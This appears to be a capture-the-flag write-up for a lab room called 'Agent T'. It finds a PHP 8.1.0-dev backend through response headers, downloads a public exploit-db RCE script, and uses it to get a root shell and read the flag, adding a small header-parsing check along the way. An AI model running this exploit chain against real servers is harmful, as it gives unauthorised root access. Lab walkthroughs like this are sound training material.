dmdhrumilmistry's gitbook
Agent T


Last updated 2 years ago


The Agent T room has a weirdly behaving admin dashboard which isn't operational. The attacker needs to find their way into the server!

Target Details

  • TARGET_IP : 10.10.71.24

  • HTTP service running on Port 80

Send Request to Target Machine

  • Send a GET request

    curl -X GET http://{TARGET_IP}
    
    --snip--

    This returns the web page's HTML content (a basic template from the web).

  • Investigate headers

    $ curl -I http://10.10.71.24
    HTTP/1.1 200 OK
    Host: 10.10.71.24
    Date: Sun, 27 Nov 2022 07:57:06 GMT
    Connection: close
    X-Powered-By: PHP/8.1.0-dev
    Content-type: text/html; charset=UTF-8

    Now we know that the server is running PHP 8.1.0-dev on the backend.

  • Searching the web for PHP 8.1.0-dev exploits, we find an RCE exploit on exploit-db (entry 49933, downloaded below).
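As an added example (not part of the original write-up), here is a small Python check that parses the `curl -I` response shown above and reports what the `X-Powered-By` header gives away: the backend technology and, in this case, an unreleased dev build running on a live host. The header block is the one captured above; the function names are my own.

```python
import re

# Constructed sample: the raw response headers captured with `curl -I` above
# (status line followed by header lines).
SAMPLE_HEADERS = """HTTP/1.1 200 OK
Host: 10.10.71.24
Date: Sun, 27 Nov 2022 07:57:06 GMT
Connection: close
X-Powered-By: PHP/8.1.0-dev
Content-type: text/html; charset=UTF-8
"""

# Matches "PHP/<major>.<minor>.<patch>" plus an optional pre-release suffix
# such as "-dev", "alpha1", "beta2" or "RC1".
PHP_VERSION_RE = re.compile(r"PHP/(\d+)\.(\d+)\.(\d+)(?:-?([A-Za-z]+)\d*)?")


def parse_headers(raw):
    """Return {lower-cased header name: value} from a raw HEAD response."""
    headers = {}
    for line in raw.splitlines()[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def assess_php_disclosure(raw):
    """Classify what X-Powered-By reveals about the backend.

    Returns the disclosed version (if any) and the findings a defender would
    act on: version disclosure itself, and an unreleased (dev/alpha/beta/RC)
    build exposed on a production host.
    """
    headers = parse_headers(raw)
    powered_by = headers.get("x-powered-by")
    result = {"powered_by": powered_by, "version": None, "prerelease": None, "findings": []}
    if powered_by is None:
        return result
    result["findings"].append("backend technology disclosed via X-Powered-By")
    m = PHP_VERSION_RE.search(powered_by)
    if m:
        result["version"] = ".".join(m.group(1, 2, 3))
        result["prerelease"] = m.group(4).lower() if m.group(4) else None
        if result["prerelease"] in ("dev", "alpha", "beta", "rc"):
            result["findings"].append(f"unreleased PHP build ({m.group(0)}) exposed on a live host")
    return result


if __name__ == "__main__":
    for finding in assess_php_disclosure(SAMPLE_HEADERS)["findings"]:
        print("FINDING:", finding)
```

Setting `expose_php = Off` in php.ini removes the header, but that only hides the version; the actual fix is not to run an unreleased build on a reachable server.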

Running Exploit Script

  • Download Exploit

    wget https://www.exploit-db.com/download/49933 -O exploit.py
  • Execute Exploit

    $ python3 exploit.py 
    Enter the full host url:
    http://{TARGET_IP}
    
    Interactive shell is opened on http://{TARGET_IP}
    Can't acces tty; job crontol turned off.
    $ whoami
    root

    Now we can execute code remotely on the web server as the root user.

Get The FLAG!!

  • List directories

    $ ls /
    bin
    boot
    dev
    etc
    flag.txt
    home
    lib
    lib64
    media
    mnt
    opt
    proc
    root
    run
    sbin
    srv
    sys
    tmp
    usr
    var

    flag.txt is in the / directory.

  • Read Flag

    $ cat /flag.txt
    flag{REDACTED}